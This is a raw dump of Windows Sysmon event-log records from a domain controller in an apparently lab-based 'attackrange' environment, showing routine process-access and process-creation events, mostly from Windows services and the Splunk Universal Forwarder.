C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429D-6000-6700-000000009A01}2748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429D-6000-6700-000000009A01}2748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.267{08A6967A-429D-6000-6700-000000009A01}2748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.326{08A6967A-4298-6000-3300-000000009A01}2812WIN-DC-2500fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000002295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.228{08A6967A-429C-6000-6600-000000009A01}38242568C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2B00-000000009A01}2680C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429E-6000-7400-000000009A01}4044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429E-6000-7400-000000009A01}4044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.540{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429E-6000-7400-000000009A01}4044C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.542{08A6967A-429E-6000-7400-000000009A01}4044C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429E-6000-7300-000000009A01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNE